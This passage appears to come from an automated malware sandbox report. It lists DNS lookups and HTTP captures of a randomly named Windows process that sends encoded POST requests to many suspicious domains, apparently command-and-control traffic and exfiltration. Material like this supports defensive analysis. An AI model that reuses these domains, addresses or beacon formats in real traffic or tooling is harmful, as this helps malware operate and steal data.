Nov 11, 2024 06:53:43.069972038 CET	192.168.2.4	1.1.1.1	0x7358	Standard query (0)	www.akkushaber.xyz	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:56.379472971 CET	192.168.2.4	1.1.1.1	0xae22	Standard query (0)	www.wddb97.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 06:50:31.388427019 CET	1.1.1.1	192.168.2.4	0x4e2	No error (0)	www.berita-juli2024162.sbs	berita-juli2024162.sbs		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:50:31.388427019 CET	1.1.1.1	192.168.2.4	0x4e2	No error (0)	berita-juli2024162.sbs		67.223.118.17	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:50:47.158796072 CET	1.1.1.1	192.168.2.4	0xf60e	No error (0)	www.innovators.group		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:50:47.158796072 CET	1.1.1.1	192.168.2.4	0xf60e	No error (0)	www.innovators.group		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:00.286614895 CET	1.1.1.1	192.168.2.4	0x96ff	No error (0)	www.ulula.org		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:00.286614895 CET	1.1.1.1	192.168.2.4	0x96ff	No error (0)	www.ulula.org		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:13.530462980 CET	1.1.1.1	192.168.2.4	0xa37d	No error (0)	www.havan-oficial.online		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:26.647816896 CET	1.1.1.1	192.168.2.4	0xfbaf	No error (0)	www.digitalincomenow.net	digitalincomenow.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:51:26.647816896 CET	1.1.1.1	192.168.2.4	0xfbaf	No error (0)	digitalincomenow.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:26.647816896 CET	1.1.1.1	192.168.2.4	0xfbaf	No error (0)	digitalincomenow.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:39.926743031 CET	1.1.1.1	192.168.2.4	0xc59	No error (0)	www.qadlo.life		162.0.211.143	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:51:53.267417908 CET	1.1.1.1	192.168.2.4	0xcbe3	No error (0)	www.electronify.shop	electronify.shop		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:51:53.267417908 CET	1.1.1.1	192.168.2.4	0xcbe3	No error (0)	electronify.shop		84.32.84.32	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:07.664774895 CET	1.1.1.1	192.168.2.4	0x5644	No error (0)	www.lowerbackpain.site		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:20.803515911 CET	1.1.1.1	192.168.2.4	0x58e1	No error (0)	www.mythkitchen.net	mythkitchen.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:52:20.803515911 CET	1.1.1.1	192.168.2.4	0x58e1	No error (0)	mythkitchen.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:20.803515911 CET	1.1.1.1	192.168.2.4	0x58e1	No error (0)	mythkitchen.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:34.421690941 CET	1.1.1.1	192.168.2.4	0x3f2	No error (0)	www.36ded.top	36ded.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:52:34.421690941 CET	1.1.1.1	192.168.2.4	0x3f2	No error (0)	36ded.top		154.23.184.141	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:52:48.443121910 CET	1.1.1.1	192.168.2.4	0x3a0a	No error (0)	www.2q33e.top	2q33e.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:52:48.443121910 CET	1.1.1.1	192.168.2.4	0x3a0a	No error (0)	2q33e.top		38.47.233.52	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:02.356408119 CET	1.1.1.1	192.168.2.4	0xa244	No error (0)	www.figa1digital.services		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:02.356408119 CET	1.1.1.1	192.168.2.4	0xa244	No error (0)	www.figa1digital.services		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:15.584079027 CET	1.1.1.1	192.168.2.4	0x99f0	No error (0)	www.7nz4.xyz	7nz4.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:53:15.584079027 CET	1.1.1.1	192.168.2.4	0x99f0	No error (0)	7nz4.xyz		38.55.215.72	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:29.397358894 CET	1.1.1.1	192.168.2.4	0x25e3	No error (0)	www.wcp95.top	wcp95.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:53:29.397358894 CET	1.1.1.1	192.168.2.4	0x25e3	No error (0)	wcp95.top		154.23.184.95	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:43.121646881 CET	1.1.1.1	192.168.2.4	0x7358	No error (0)	www.akkushaber.xyz		172.67.217.176	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:43.121646881 CET	1.1.1.1	192.168.2.4	0x7358	No error (0)	www.akkushaber.xyz		104.21.70.11	A (IP address)	IN (0x0001)	false
Nov 11, 2024 06:53:56.708976030 CET	1.1.1.1	192.168.2.4	0xae22	No error (0)	www.wddb97.top	wddb97.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 06:53:56.708976030 CET	1.1.1.1	192.168.2.4	0xae22	No error (0)	wddb97.top		206.119.82.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.berita-juli2024162.sbs

www.innovators.group

www.ulula.org

www.havan-oficial.online

www.digitalincomenow.net

www.qadlo.life

www.electronify.shop

www.lowerbackpain.site

www.mythkitchen.net

www.36ded.top

www.2q33e.top

www.figa1digital.services

www.7nz4.xyz

www.wcp95.top

www.akkushaber.xyz

www.wddb97.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	67.223.118.17	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:50:31.406601906 CET	531	OUT	GET /b1o1/?42T8f=ABwh0lAHdJnXMBd&fZah6=YsBs0CinjQ802jw7BWH43U6yChFfBgTCWtBfXrDog/OSaTn6EFf5NE6XC8wGYTCejLSWH1L1CzOp5Uda5M1yGZHuu6Q/qvkBsiCvvtwaqztjOHxPUPsPREc= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.berita-juli2024162.sbs User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:50:32.006899118 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Mon, 11 Nov 2024 05:50:31 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 39 30 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2790<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 11, 2024 06:50:32.006910086 CET	1236	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
Nov 11, 2024 06:50:32.006920099 CET	1236	IN	Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
Nov 11, 2024 06:50:32.006930113 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
Nov 11, 2024 06:50:32.006941080 CET	848	IN	Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34 Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
Nov 11, 2024 06:50:32.006944895 CET	1236	IN	Data Raw: 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 Data Ascii: chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPe
Nov 11, 2024 06:50:32.006953955 CET	1236	IN	Data Raw: 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 Data Ascii: us8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD
Nov 11, 2024 06:50:32.006963015 CET	1236	IN	Data Raw: 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67 67 67 3d 3d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 Data Ascii: XteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; } .status-reason
Nov 11, 2024 06:50:32.006973982 CET	858	IN	Data Raw: 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 69 6d 61 67 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 68 65 61 64 69 6e 67 22 3e 0a 20 20 20 20 Data Ascii: class="info-image" /> <div class="info-heading"> www.berita-juli2024162.sbs/cp_errordocument.shtml (port 80) </div> </li>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:50:47.177680016 CET	787	OUT	POST /aol7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.innovators.group Origin: http://www.innovators.group Referer: http://www.innovators.group/aol7/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 63 7a 47 63 61 4b 41 64 67 48 58 31 77 4e 38 76 39 71 66 69 32 56 71 67 57 72 6b 51 65 6a 48 36 58 35 39 51 42 6c 45 45 38 69 51 53 62 58 73 7a 37 4a 73 63 44 4f 48 57 47 56 2b 44 76 78 67 6d 47 6c 41 5a 54 2f 54 30 6d 68 62 67 53 51 6b 69 6c 33 6b 77 73 4f 42 73 6e 4e 47 4e 44 58 55 33 45 56 6c 6f 42 51 43 49 50 6e 32 70 50 58 2b 62 50 57 49 50 41 4f 6c 31 74 4e 37 4b 76 6d 2f 4d 49 6f 58 43 58 47 6a 47 43 6e 50 4a 68 48 34 51 6e 42 52 34 39 6a 6b 61 57 6a 64 4b 4d 4e 34 43 77 31 69 32 6e 61 38 63 56 74 71 4d 57 6c 65 6b 72 44 47 54 2f 79 44 66 32 4a 53 77 4d 42 4e 45 51 77 3d 3d Data Ascii: fZah6=czGcaKAdgHX1wN8v9qfi2VqgWrkQejH6X59QBlEE8iQSbXsz7JscDOHWGV+DvxgmGlAZT/T0mhbgSQkil3kwsOBsnNGNDXU3EVloBQCIPn2pPX+bPWIPAOl1tN7Kvm/MIoXCXGjGCnPJhH4QnBR49jkaWjdKMN4Cw1i2na8cVtqMWlekrDGT/yDf2JSwMBNEQw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:50:49.723359108 CET	807	OUT	POST /aol7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.innovators.group Origin: http://www.innovators.group Referer: http://www.innovators.group/aol7/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 63 7a 47 63 61 4b 41 64 67 48 58 31 77 75 6b 76 37 4a 33 69 78 31 71 6a 4b 62 6b 51 4d 6a 47 7a 58 35 35 51 42 6e 6f 75 38 51 30 53 62 33 63 7a 36 4e 77 63 43 4f 48 57 4e 31 2f 48 68 52 68 4c 47 6c 45 72 54 2f 66 30 6d 67 2f 67 53 55 6f 69 6c 45 63 7a 71 4f 42 71 76 74 47 54 65 48 55 33 45 56 6c 6f 42 55 72 6a 50 6b 47 70 4d 6e 75 62 4f 33 49 4f 65 65 6c 32 71 4e 37 4b 35 6d 2f 41 49 6f 57 58 58 45 58 73 43 68 4c 4a 68 44 30 51 6e 51 52 37 30 6a 6b 59 5a 44 63 6a 4c 4f 70 73 33 55 62 38 6f 63 73 42 62 74 69 79 61 44 54 2b 36 79 6e 45 74 79 6e 73 72 4f 62 45 42 43 77 4e 4c 30 74 66 4f 51 47 36 4c 73 73 2f 52 45 67 4d 36 68 33 37 46 61 77 3d Data Ascii: fZah6=czGcaKAdgHX1wukv7J3ix1qjKbkQMjGzX55QBnou8Q0Sb3cz6NwcCOHWN1/HhRhLGlErT/f0mg/gSUoilEczqOBqvtGTeHU3EVloBUrjPkGpMnubO3IOeel2qN7K5m/AIoWXXEXsChLJhD0QnQR70jkYZDcjLOps3Ub8ocsBbtiyaDT+6ynEtynsrObEBCwNL0tfOQG6Lss/REgM6h37Faw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:50:52.272842884 CET	10889	OUT	POST /aol7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.innovators.group Origin: http://www.innovators.group Referer: http://www.innovators.group/aol7/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 63 7a 47 63 61 4b 41 64 67 48 58 31 77 75 6b 76 37 4a 33 69 78 31 71 6a 4b 62 6b 51 4d 6a 47 7a 58 35 35 51 42 6e 6f 75 38 51 38 53 59 47 38 7a 37 73 77 63 59 4f 48 57 52 46 2f 45 68 52 67 4a 47 68 51 76 54 2f 43 4a 6d 6a 58 67 52 78 30 69 75 56 63 7a 2f 2b 42 71 6a 4e 47 4f 44 58 55 6d 45 56 30 6a 42 51 48 6a 50 6b 47 70 4d 68 69 62 66 6d 49 4f 63 65 6c 31 74 4e 37 4f 76 6d 2f 73 49 6f 50 67 58 45 44 57 43 52 72 4a 69 6e 59 51 6c 69 35 37 31 44 6b 57 65 44 63 37 4c 4f 6c 76 33 55 48 65 6f 63 77 37 62 76 2b 79 61 47 75 69 6e 33 48 48 30 6a 54 76 34 4f 7a 4d 4f 53 34 4d 54 6e 52 6c 49 31 53 43 64 4e 4d 52 53 6d 31 4a 6e 45 36 77 66 73 66 43 64 6e 63 73 2f 37 6f 6d 34 55 35 57 72 70 4f 68 47 42 73 52 6a 38 46 52 57 38 64 59 4f 52 56 58 49 6d 56 62 78 67 4b 67 6c 75 43 70 43 78 43 50 58 75 72 51 77 7a 6a 54 56 35 33 38 6f 49 55 46 51 56 30 75 42 62 69 41 65 75 49 78 61 70 53 49 51 50 32 41 33 72 65 4d 73 35 53 78 31 37 51 71 65 2b 44 67 48 34 62 33 32 52 37 38 43 6d 51 65 33 64 75 6a [TRUNCATED] Data Ascii: fZah6=czGcaKAdgHX1wukv7J3ix1qjKbkQMjGzX55QBnou8Q8SYG8z7swcYOHWRF/EhRgJGhQvT/CJmjXgRx0iuVcz/+BqjNGODXUmEV0jBQHjPkGpMhibfmIOcel1tN7Ovm/sIoPgXEDWCRrJinYQli571DkWeDc7LOlv3UHeocw7bv+yaGuin3HH0jTv4OzMOS4MTnRlI1SCdNMRSm1JnE6wfsfCdncs/7om4U5WrpOhGBsRj8FRW8dYORVXImVbxgKgluCpCxCPXurQwzjTV538oIUFQV0uBbiAeuIxapSIQP2A3reMs5Sx17Qqe+DgH4b32R78CmQe3dujiOFU0aFWiO/k6h3qfK0iSctTWYC4P4SM9z43TsJ5GtdWdcw/ZZcyeiuojl2d8aU20zIw6ROEHsewHdVB6plchpudIJy4ufmqzplvbnW09ftAEQMF3WP1bA8t93z24pFCv6vMNXUycHesTsGagAo7mwbHzQkLLivmEQhTsDQTYhMVUmXvHy8TmnJL3vz1WCv495I3j34N/HXTj0Zs75JbeaGgyBMJA6W8ppThLNiuMNaTrknKqepAyDS7Wlp/SjjbSVv3ZNRdrKtxe3fY/RuufBObgk/xGqFUCi3cgtTL94aY+NTrw5db9jua8dn1jU6QMxjrQfcfp+1xFt/SbPt6vqfeurPY9NCmOx33Q/aqeBaaztWJv7iUBH67A0w8yTP060EgokzUdTd3sQ4J5JpIRd/yh6H97vX0W3ntkhoWJyLA21hV8Rxd5AkzoQlmF6qEzzbiKR6WtnJe8j6gi3bsj95OGkLCctsmby2S2YSqeK9Gt0KL1lplwQvwrXvjiPOdJCS0FbcrXVD22EHARXJSBN40DkyE/bI/LKVr88+uVmoaTMA+yo+xm0Lf6XrTC3JKgj3bbTBPMaS/PhBWQwMlWMNOp3t7fp3BUiv9A0a9Wnky6tOFSUS4x1ByKPZyGsg1XERBSbe4KXUx6NmJxwWqN8bgmfVTxgZ42a [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49748	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:50:54.819324970 CET	525	OUT	GET /aol7/?fZah6=Rxu8Z90G9VWM2dhhwInP5UWvQ8oNZRnGbIBiN2Yx7zo2WUAB2/dtC+DxHmOlvC9JJTkxcfTX/APyKTxCxnQfyKdrjKf6HloyJ1pBHAL5FHO6MnioIGNGXfY=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.innovators.group User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:50:55.249526024 CET	403	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 05:50:55 GMT Content-Type: text/html Content-Length: 263 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 5a 61 68 36 3d 52 78 75 38 5a 39 30 47 39 56 57 4d 32 64 68 68 77 49 6e 50 35 55 57 76 51 38 6f 4e 5a 52 6e 47 62 49 42 69 4e 32 59 78 37 7a 6f 32 57 55 41 42 32 2f 64 74 43 2b 44 78 48 6d 4f 6c 76 43 39 4a 4a 54 6b 78 63 66 54 58 2f 41 50 79 4b 54 78 43 78 6e 51 66 79 4b 64 72 6a 4b 66 36 48 6c 6f 79 4a 31 70 42 48 41 4c 35 46 48 4f 36 4d 6e 69 6f 49 47 4e 47 58 66 59 3d 26 34 32 54 38 66 3d 41 42 77 68 30 6c 41 48 64 4a 6e 58 4d 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fZah6=Rxu8Z90G9VWM2dhhwInP5UWvQ8oNZRnGbIBiN2Yx7zo2WUAB2/dtC+DxHmOlvC9JJTkxcfTX/APyKTxCxnQfyKdrjKf6HloyJ1pBHAL5FHO6MnioIGNGXfY=&42T8f=ABwh0lAHdJnXMBd"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49785	13.248.169.48	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:00.302608013 CET	766	OUT	POST /4w1b/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.ulula.org Origin: http://www.ulula.org Referer: http://www.ulula.org/4w1b/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 61 30 75 7a 4c 66 4a 4e 4b 46 4a 4e 4c 52 74 52 76 6f 57 4a 5a 71 50 35 43 43 65 71 33 78 43 58 55 55 55 66 7a 57 79 6f 6d 75 72 65 38 5a 65 37 64 59 48 36 4e 72 68 54 46 73 79 6f 70 4f 76 66 6b 6b 51 49 41 70 7a 41 55 35 58 71 6e 59 70 57 76 41 79 75 47 77 6f 48 67 6b 54 79 61 4a 73 72 49 30 7a 66 7a 69 47 6c 79 63 39 58 54 33 4f 6a 64 45 32 4a 6a 6a 48 36 4b 6a 76 51 41 49 35 47 36 43 4b 4e 78 44 5a 31 4e 45 78 72 53 50 73 4b 52 4e 6f 4b 68 5a 50 52 57 53 53 55 54 49 6e 66 2b 4b 62 71 36 38 32 6e 44 31 71 63 52 72 38 49 66 52 6a 58 33 4f 42 58 6f 66 6c 55 53 32 79 79 33 67 3d 3d Data Ascii: 